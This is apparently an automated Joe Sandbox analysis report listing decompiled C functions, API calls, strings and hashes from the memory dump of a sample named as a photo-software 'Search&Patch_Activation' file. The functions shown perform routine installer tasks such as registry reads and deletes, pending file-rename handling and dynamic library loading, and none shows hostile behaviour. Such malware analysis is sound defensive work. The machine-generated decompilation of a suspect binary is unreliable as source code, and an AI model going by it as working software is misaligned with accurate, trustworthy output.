Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Find$CloseFileNext
String ID: @G
API String ID: 2066263336-4243591082
Opcode ID: 1cc741e5c4ef1280895ba2791e394c1bf036ebb5d817aa49c04b32d02f1d3c68
Instruction ID: 0da19416abf0173bdc8d3c7c7f8ad009371619145402d5c4f287baa4c6a871bb
Opcode Fuzzy Hash: 1cc741e5c4ef1280895ba2791e394c1bf036ebb5d817aa49c04b32d02f1d3c68
Instruction Fuzzy Hash: 28C1393490424D9FCF11DFA5C881ADEBBB9BF4C304F5081AAE848B7291D738AA45DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00455F08 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142
registryCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00455F08(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr* _v24;
				char _v112;
				char _v4208;
				char _v4212;
				char _v4216;
				void* _t41;
				void* _t80;
				void* _t86;
				void* _t105;
				void* _t106;
				intOrPtr _t111;
				intOrPtr _t113;
				intOrPtr _t119;
				void* _t129;
				void* _t130;
				intOrPtr _t132;

				_t129 = _t130;
				_push(__eax);
				_t132 = _t130 + 0xffffffffffffef90;
				_v4212 = 0;
				_v4216 = 0;
				_v16 = 0;
				_v20 = 0;
				_v8 = __eax;
				_push(_t129);
				_push(0x4560df);
				_push( *[fs:eax]);
				 *[fs:eax] = _t132;
				_t41 = E0045200C( &_v112);
				_push(_t129);
				_push(0x45609f);
				_push( *[fs:edx]);
				 *[fs:edx] = _t132;
				if(E0042E084(_t41) == 0) {
					E0042DD28( &_v4216);
					E0042C88C(_v4216,  &_v4212);
					E004035C0( &_v20, "WININIT.INI", _v4212);
					if(E0042D1B4(_v20) == 0) {
						goto L12;
					} else {
						_v24 = E00450F04(1, 1, 0, 2);
						_push(_t129);
						_push(0x45608e);
						_push( *[fs:edx]);
						 *[fs:edx] = _t132;
						while( *((intOrPtr*)( *_v24 + 8))() != 0) {
							E00452034( &_v112, _t62,  &_v4208);
						}
						_pop(_t119);
						 *[fs:eax] = _t119;
						_push(0x456095);
						return E00402B58(_v24);
					}
				} else {
					if(E0042E2AC(0, "SYSTEM\\CurrentControlSet\\Control\\Session Manager", 0x80000002,  &_v12, 1, 0) == 0) {
						if(E0042E1E8() != 0) {
							_push(E00403574(_v16));
							_t86 = E00403744( &_v16);
							_pop(_t106);
							E00452034( &_v112, _t106, _t86);
						}
						if(E0042E1E8() != 0) {
							_push(E00403574(_v16));
							_t80 = E00403744( &_v16);
							_pop(_t105);
							E00452034( &_v112, _t105, _t80);
						}
						RegCloseKey(_v12);
					}
					L12:
					_pop(_t111);
					 *[fs:eax] = _t111;
					E004520E4( &_v112, _v8);
					_pop(_t113);
					 *[fs:eax] = _t113;
					_push(0x4560e6);
					E00403420( &_v4216, 2);
					return E00403420( &_v20, 2);
				}
			}

0x00455f09
0x00455f11
0x00455f12
0x00455f1a
0x00455f20
0x00455f26
0x00455f29
0x00455f2c
0x00455f31
0x00455f32
0x00455f37
0x00455f3a
0x00455f40
0x00455f47
0x00455f48
0x00455f4d
0x00455f50
0x00455f5a
0x00455ff5
0x00456006
0x00456019
0x00456028
0x00000000
0x0045602a
0x0045603f
0x00456044
0x00456045
0x0045604a
0x0045604d
0x00456050
0x00456071
0x00456071
0x0045607a
0x0045607d
0x00456080
0x0045608d
0x0045608d
0x00455f60
0x00455f7b
0x00455f93
0x00455f9d
0x00455fa1
0x00455fab
0x00455fac
0x00455fac
0x00455fc3
0x00455fcd
0x00455fd1
0x00455fdb
0x00455fdc
0x00455fdc
0x00455fe5
0x00455fe5
0x00456095
0x00456097
0x0045609a
0x004560af
0x004560b6
0x004560b9
0x004560bc
0x004560cc
0x004560de
0x004560de

APIs

Part of subcall function 0042E2AC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00485FB3,?,00000001,?,?,00485FB3,?,00000001,00000000), ref: 0042E2C8

RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045609F,?,00000000,004560DF), ref: 00455FE5

Strings

PendingFileRenameOperations, xrefs: 00455F84
PendingFileRenameOperations2, xrefs: 00455FB4
SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455F68
WININIT.INI, xrefs: 00456014

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CloseOpen
String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
API String ID: 47109696-2199428270
Opcode ID: 2a97baff5bdcb10e225aefec3695e631e92a0455b1d43f5b4b9cbf203a51a4c7
Instruction ID: a4a9f2ec6dce7785653c913c6c24b0c1e176cc517468c749f5f74b0afa9d98e4
Opcode Fuzzy Hash: 2a97baff5bdcb10e225aefec3695e631e92a0455b1d43f5b4b9cbf203a51a4c7
Instruction Fuzzy Hash: F551B430E002089BDB15EF62DD51ADEB7B9EF45705F50817BF904A72C2DB78AE49CA18

Uniqueness

Uniqueness Score: -1.00%

Function 0049ABE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0049ABE0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				intOrPtr _v28;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr _t39;
				intOrPtr _t43;
				intOrPtr _t56;
				intOrPtr _t61;
				intOrPtr _t87;
				void* _t91;
				void* _t92;
				void* _t93;
				intOrPtr _t94;
				void* _t95;

				_t95 = __eflags;
				_t90 = __esi;
				_t89 = __edi;
				_t63 = __ebx;
				_t92 = _t93;
				_t94 = _t93 + 0xffffffe8;
				_v20 = 0;
				 *[fs:eax] = _t94;
				_t24 =  *0x49e62c; // 0x2252410
				E00424754(_t24, "Uninstall", __edi);
				_t26 =  *0x49e62c; // 0x2252410
				ShowWindow( *(_t26 + 0x20), 5);
				 *[fs:edx] = _t94;
				E00481550();
				E0042DD54( &_v20);
				E00407738(_v20);
				E0042D8DC(0, __ebx,  &_v20, __edi, __esi);
				E00403450(0x49f540, __ebx, _v20, _t89, __esi);
				E004994B4(_t63, _t89, _t90, _t95);
				_t39 =  *0x49f540; // 0x0
				E0042C988(_t39, _t63,  &_v20, 0x49ae70, _t89, _t90, _t95);
				E00403450(0x49f544, _t63, _v20, _t89, _t90);
				_t43 =  *0x49f540; // 0x0
				E0042C988(_t43, _t63,  &_v20, 0x49ae80, _t89, _t90, _t95);
				E00403450(0x49f548, _t63, _v20, _t89, _t90);
				_v8 = E00450F04(1, 1, 0, 2);
				 *[fs:eax] = _t94;
				 *((intOrPtr*)( *_v8 + 4))( *[fs:eax], 0x49ad28, _t92,  *[fs:edx], 0x49ae11, _t92,  *[fs:eax], 0x49ae45, _t92, __edi, __esi, __ebx, _t91);
				E00450EC8(_v8, _v28 - 8);
				E00450EA0(_v8, 8,  &_v16);
				if(_v16 == 0x67734d49) {
					_t56 =  *0x49f540; // 0x0
					E00451D88(_t56, _t63, 1, _v12, _t89, _t90);
				} else {
					_t61 =  *0x49f548; // 0x0
					E00451D88(_t61, _t63, 1, 0, _t89, _t90);
				}
				_pop(_t87);
				 *[fs:eax] = _t87;
				_push(E0049AD2F);
				return E00402B58(_v8);
			}

0x0049abe0
0x0049abe0
0x0049abe0
0x0049abe0
0x0049abe1
0x0049abe3
0x0049abeb
0x0049abf9
0x0049ac01
0x0049ac06
0x0049ac0d
0x0049ac16
0x0049ac26
0x0049ac29
0x0049ac31
0x0049ac39
0x0049ac43
0x0049ac50
0x0049ac55
0x0049ac62
0x0049ac67
0x0049ac74
0x0049ac81
0x0049ac86
0x0049ac93
0x0049acb0
0x0049acbe
0x0049acc9
0x0049acd5
0x0049ace5
0x0049acf1
0x0049ad08
0x0049ad0d
0x0049acf3
0x0049acf7
0x0049acfc
0x0049acfc
0x0049ad14
0x0049ad17
0x0049ad1a
0x0049ad27

APIs

Part of subcall function 00424754: SetWindowTextA.USER32(?,00000000), ref: 0042476C

ShowWindow.USER32(?,00000005,00000000,0049AE45,?,?,00000000), ref: 0049AC16

Part of subcall function 0042DD54: GetSystemDirectoryA.KERNEL32 ref: 0042DD67

Part of subcall function 00407738: SetCurrentDirectoryA.KERNEL32(00000000,?,0049AC3E,00000000,0049AE11,?,?,00000005,00000000,0049AE45,?,?,00000000), ref: 00407743

Part of subcall function 0042D8DC: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D96A,?,?,?,00000001,?,004568AE,00000000,00456916), ref: 0042D911

Strings

.msg, xrefs: 0049AC7C
Uninstall, xrefs: 0049ABFC
IMsg, xrefs: 0049ACEA
.dat, xrefs: 0049AC5D

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
String ID: .dat$.msg$IMsg$Uninstall
API String ID: 3312786188-1660910688
Opcode ID: 59a462c87a2c612d04fafa380d97f5462470f3fbc2a9e328ae4fda63801937ee
Instruction ID: 41fce5d7155baeeb4201c3977cb987a547f2b9c6e2b52af906847905e2aac1f5
Opcode Fuzzy Hash: 59a462c87a2c612d04fafa380d97f5462470f3fbc2a9e328ae4fda63801937ee
Instruction Fuzzy Hash: 4E31A374A00214AFCB00EF65CC52A6E7BB5FB89304F61857AF800E7752D739AD15CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042EF38 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E0042EF38(void* __eax, void* __edx, intOrPtr _a4080) {
				short _v4108;
				void* _t6;
				signed int _t12;
				int _t15;
				signed int _t19;
				intOrPtr* _t21;
				void* _t23;
				intOrPtr _t24;
				void* _t25;
				void* _t26;

				_push(__eax);
				_t6 = 2;
				do {
					_t25 = _t25 + 0xfffff004;
					_push(_t6);
					_t6 = _t6 - 1;
				} while (_t6 != 0);
				_t26 = _t25 + 4;
				_t23 = __edx;
				_t24 = _a4080;
				E0042EFE4(_t24);
				_t21 = GetProcAddress(GetModuleHandleA("user32.dll"), "ShutdownBlockReasonCreate");
				if(_t21 == 0) {
					_t12 = 0;
				} else {
					_t15 = E00403574(_t23);
					 *((short*)(_t26 + MultiByteToWideChar(0, 0, E00403738(_t23), _t15,  &_v4108, 0xfff) * 2)) = 0;
					_t19 =  *_t21(_t24, _t26);
					asm("sbb eax, eax");
					_t12 =  ~( ~_t19);
				}
				return _t12;
			}

0x0042ef3b
0x0042ef3c
0x0042ef41
0x0042ef41
0x0042ef47
0x0042ef48
0x0042ef48
0x0042ef52
0x0042ef55
0x0042ef57
0x0042ef5b
0x0042ef75
0x0042ef79
0x0042efb0
0x0042ef7b
0x0042ef87
0x0042ef9e
0x0042efa6
0x0042efaa
0x0042efac
0x0042efac
0x0042efbb

APIs

GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EF6A
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EF70
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EF99

Strings

user32.dll, xrefs: 0042EF65
ShutdownBlockReasonCreate, xrefs: 0042EF60

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressByteCharHandleModuleMultiProcWide
String ID: ShutdownBlockReasonCreate$user32.dll
API String ID: 828529508-2866557904
Opcode ID: 76c3ae556ff5016cceda8b60c842384167c68f0016227ebd4f9b5bd92a37e0ae
Instruction ID: 98e14bcb75ccd3fa79125cd8f842b3c85c6f4936fd04c03cffbbcbf6111bfa2c
Opcode Fuzzy Hash: 76c3ae556ff5016cceda8b60c842384167c68f0016227ebd4f9b5bd92a37e0ae
Instruction Fuzzy Hash: 8AF0F6E134462237E620B27FAC82F7B55CC8F98719F15003AB508FA2C1EA6CC905426F

Uniqueness

Uniqueness Score: -1.00%

Function 00458888 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00458888(HANDLE* __eax) {
				HANDLE* _v8;
				long _v12;
				intOrPtr _t7;
				long _t10;
				intOrPtr _t27;
				void* _t30;

				_v8 = __eax;
				_push(_t30);
				_push(0x458905);
				_push( *[fs:edx]);
				 *[fs:edx] = _t30 + 0xfffffff8;
				do {
					_t7 =  *0x49e62c; // 0x2252410
					E0042493C(_t7);
					_t10 = MsgWaitForMultipleObjects(1, _v8, 0, 0xffffffff, 0xff);
				} while (_t10 == 1);
				if(_t10 + 1 == 0) {
					E00453C98("MsgWaitForMultipleObjects");
				}
				if(GetExitCodeProcess( *_v8,  &_v12) == 0) {
					E00453C98("GetExitCodeProcess");
				}
				_pop(_t27);
				 *[fs:eax] = _t27;
				_push(E0045890C);
				return CloseHandle( *_v8);
			}

0x0045888e
0x00458893
0x00458894
0x00458899
0x0045889c
0x0045889f
0x0045889f
0x004588a4
0x004588b8
0x004588bd
0x004588c3
0x004588ca
0x004588ca
0x004588e0
0x004588e7
0x004588e7
0x004588ee
0x004588f1
0x004588f4
0x00458904

APIs

MsgWaitForMultipleObjects.USER32 ref: 004588B8
GetExitCodeProcess.KERNEL32 ref: 004588D9
CloseHandle.KERNEL32(?,0045890C,00000001,00000000,000000FF,000000FF,00000000,00458905), ref: 004588FF

Strings

GetExitCodeProcess, xrefs: 004588E2
MsgWaitForMultipleObjects, xrefs: 004588C5

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CloseCodeExitHandleMultipleObjectsProcessWait
String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
API String ID: 2573145106-3235461205
Opcode ID: be6dda61f35e97c9406aa8abc37fd9e2e9b8a4ec884dd5ed8b307779caa2d451
Instruction ID: 5ab474d98eb3a0ece9291f621c53fee7be03ae90ebbbcbdbcbdfc60506012216
Opcode Fuzzy Hash: be6dda61f35e97c9406aa8abc37fd9e2e9b8a4ec884dd5ed8b307779caa2d451
Instruction Fuzzy Hash: 5601A271600204AFDB11EBA98C02A6A73A8EB45715F60057AF810F73D3DE38AE04961D

Uniqueness

Uniqueness Score: -1.00%

Function 0042E2D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0042E2D4(void* __eax, char* __ecx, void* __edx) {

				_t10 = __ecx;
				_t7 = __edx;
				if(__eax == 2) {
					if( *0x49e660 == 0) {
						 *0x49e660 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "RegDeleteKeyExA");
					}
					if( *0x49e660 == 0) {
						return 0x7f;
					} else {
						return  *0x49e660(_t7, _t10, 0x100, 0);
					}
				}
				return RegDeleteKeyA(__edx, __ecx);
			}

0x0042e2d6
0x0042e2d8
0x0042e2dc
0x0042e2ef
0x0042e306
0x0042e306
0x0042e312
0x00000000
0x0042e314
0x00000000
0x0042e31d
0x0042e312
0x0042e2e7

APIs

RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042E2E0
GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042E47B,00000000,0042E493,?,?,?,?,00000006,?,00000000,0049A6E1), ref: 0042E2FB
GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E301

Strings

advapi32.dll, xrefs: 0042E2F6
RegDeleteKeyExA, xrefs: 0042E2F1

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressDeleteHandleModuleProc
String ID: RegDeleteKeyExA$advapi32.dll
API String ID: 588496660-1846899949
Opcode ID: a7d7d163a2b4572837d540fa9020a88c6075fbeda32d6ef88a980983cb7fdc09
Instruction ID: 4593d6951ad1389f122581937974f3187b46c4a982a9796ded25b619d02fe20b
Opcode Fuzzy Hash: a7d7d163a2b4572837d540fa9020a88c6075fbeda32d6ef88a980983cb7fdc09
Instruction Fuzzy Hash: 84E06571750234F6D674AA677C4AF97260CD764726F940837F545661D187BC1C40CA5C

Uniqueness

Uniqueness Score: -1.00%

Function 0042EE3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0042EE3C(long __eax) {
				long _t1;
				long _t5;

				_t1 = __eax;
				_t5 = __eax;
				if( *0x49e664 == 0) {
					 *0x49e668 = GetProcAddress(GetModuleHandleA("user32.dll"), "ChangeWindowMessageFilter");
					_t1 = InterlockedExchange(0x49e664, 1);
				}
				if( *0x49e668 != 0) {
					return  *0x49e668(_t5, 1);
				}
				return _t1;
			}

0x0042ee3c
0x0042ee3d
0x0042ee46
0x0042ee5d
0x0042ee69
0x0042ee69
0x0042ee75
0x00000000
0x0042ee7a
0x0042ee81

APIs

GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EF00,00000004,0049C938,00457A81,00457E24,004579D8,00000000,00000B06,00000000,00000000,00000002,00000000,0048361D), ref: 0042EE52
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EE58
InterlockedExchange.KERNEL32(0049E664,00000001), ref: 0042EE69

Strings

user32.dll, xrefs: 0042EE4D
ChangeWindowMessageFilter, xrefs: 0042EE48

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressExchangeHandleInterlockedModuleProc
String ID: ChangeWindowMessageFilter$user32.dll
API String ID: 3478007392-2498399450
Opcode ID: d92cc62ee20d7ac2e8fab9b782aa11417d22a09e2c448ccd967ab38ddec500c6
Instruction ID: 048ca61b172dfedb03cf1c059d2784ab3124221c9e2a99dd16ddbc81be59c6a3
Opcode Fuzzy Hash: d92cc62ee20d7ac2e8fab9b782aa11417d22a09e2c448ccd967ab38ddec500c6
Instruction Fuzzy Hash: B6E0B6A1661310EAFA10B7736C8AF562555AB34B19FA1043BF100651E1C6BC0884C91D

Uniqueness

Uniqueness Score: -1.00%

Function 00479D08 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19
libraryloaderthreadCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00479D08(void* __ecx) {
				struct HWND__* _t1;
				_Unknown_base(*)()* _t2;
				DWORD* _t7;

				_t1 =  *0x49f0e8; // 0x0
				_t2 = GetWindowThreadProcessId(_t1, _t7);
				if(_t2 != 0) {
					_t2 = GetProcAddress(GetModuleHandleA("user32.dll"), "AllowSetForegroundWindow");
					if(_t2 != 0) {
						_t2 =  *_t2( *_t7);
					}
				}
				return _t2;
			}

0x00479d0a
0x00479d10
0x00479d17
0x00479d29
0x00479d30
0x00479d36
0x00479d36
0x00479d30
0x00479d39

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 00479D10
GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00479E07,0049F0AC,00000000), ref: 00479D23
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00479D29

Strings

user32.dll, xrefs: 00479D1E
AllowSetForegroundWindow, xrefs: 00479D19

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressHandleModuleProcProcessThreadWindow
String ID: AllowSetForegroundWindow$user32.dll
API String ID: 1782028327-3855017861
Opcode ID: c36f3de8e5dc3318ea7383228e8bc1b00cc42ae4fa1597e4dc77134cd03fc9db
Instruction ID: 5357bd2adcb02916e042a40b4a090124369338466f1717feba3059f4eb7ed124
Opcode Fuzzy Hash: c36f3de8e5dc3318ea7383228e8bc1b00cc42ae4fa1597e4dc77134cd03fc9db
Instruction Fuzzy Hash: F8D0A9A0200301A6ED20B3B68C0BEEF239C8E9470AB10C83B3808F2187CA3CDC455B3C

Uniqueness

Uniqueness Score: -1.00%

Function 00448A1C Relevance: 7.7, APIs: 5, Instructions: 160
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00448A1C(intOrPtr __eax, void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v33;
				intOrPtr* _t113;
				struct HINSTANCE__* _t114;
				intOrPtr _t144;
				intOrPtr _t153;
				struct HINSTANCE__* _t155;
				void* _t158;

				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t158);
				_push(0x448c1c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t158 + 0xffffffe0;
				E00403494( &_v20,  *((intOrPtr*)(_v12 + 0x18)));
				E004037B8( &_v20, 4, 1);
				E00403778(_v20, E0040385C(0x448c34, _v20) - 1, 1,  &_v24);
				E004037B8( &_v20, E00403574(_v24) + 1, 1);
				_t153 = E00431EF8(_v24);
				E00403778(_v20, E0040385C(0x448c34, _v20) - 1, 1,  &_v28);
				E004037B8( &_v20, E00403574(_v28) + 1, 1);
				asm("sbb eax, eax");
				_v33 =  ~( ~( *(_v20 + 2)));
				_v32 = 0x7fffffff;
				_t155 = 0;
				do {
					_t113 = E0043E00C(_v8,  &_v32, 0x448a00);
					if(_t113 != 0) {
						goto L10;
					}
					if(_v24 != 0) {
						__eflags = _v33;
						if(_v33 == 0) {
							_t155 = LoadLibraryA(E00403738(_v24));
						} else {
							_t155 = LoadLibraryExA(E00403738(_v24), 0, 8);
						}
						__eflags = _t155;
						if(__eflags != 0) {
							_t113 = E00403B80(__eflags);
							 *_t113 = _t153;
							_t38 = _t113 + 4; // 0x4
							E00403450(_t38, _t113, _v24, _t153, _t155);
							 *(_t113 + 8) = _t155;
							E0043DF78(_v8, _t113, 0x448a00);
							goto L10;
						} else {
							 *((intOrPtr*)(_v12 + 0xc)) = 1;
							 *_v16 = GetLastError();
							goto L17;
						}
					} else {
						 *((intOrPtr*)(_v12 + 0xc)) = 1;
						 *_v16 = 0x7e;
						L17:
						_pop(_t144);
						 *[fs:eax] = _t144;
						_push(0x448c23);
						return E00403420( &_v28, 3);
					}
					L10:
					__eflags = _t153 -  *_t113;
					if(_t153 ==  *_t113) {
						E00403684( *((intOrPtr*)(_t113 + 4)), _v24);
						if(__eflags == 0) {
							_t155 =  *(_t113 + 8);
						}
					}
					__eflags = _t155;
				} while (_t155 == 0);
				_t114 = GetProcAddress(_t155, E00403738(_v28));
				 *(_v12 + 8) = _t114;
				__eflags = _t114;
				if(_t114 == 0) {
					 *((intOrPtr*)(_v12 + 0xc)) = 1;
					 *_v16 = GetLastError();
				}
				goto L17;
			}

0x00448a27
0x00448a2a
0x00448a2d
0x00448a30
0x00448a33
0x00448a36
0x00448a3b
0x00448a3c
0x00448a41
0x00448a44
0x00448a50
0x00448a62
0x00448a83
0x00448a9b
0x00448aa8
0x00448ac6
0x00448ade
0x00448aeb
0x00448aef
0x00448af2
0x00448af9
0x00448afb
0x00448b0b
0x00448b0f
0x00000000
0x00000000
0x00448b19
0x00448b35
0x00448b39
0x00448b5f
0x00448b3b
0x00448b4d
0x00448b4d
0x00448b61
0x00448b63
0x00448b8f
0x00448b91
0x00448b93
0x00448b99
0x00448b9e
0x00448bab
0x00000000
0x00448b65
0x00448b68
0x00448b77
0x00000000
0x00448b79
0x00448b1b
0x00448b1e
0x00448b28
0x00448c01
0x00448c03
0x00448c06
0x00448c09
0x00448c1b
0x00448c1b
0x00448bb0
0x00448bb0
0x00448bb2
0x00448bba
0x00448bbf
0x00448bc1
0x00448bc1
0x00448bbf
0x00448bc4
0x00448bc4
0x00448bdb
0x00448be0
0x00448be3
0x00448be5
0x00448bea
0x00448bf9
0x00448bfb
0x00000000

APIs

LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448C1C), ref: 00448B48
GetLastError.KERNEL32(00000000,?,?,00000000,00448C1C), ref: 00448B6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 00448BD6
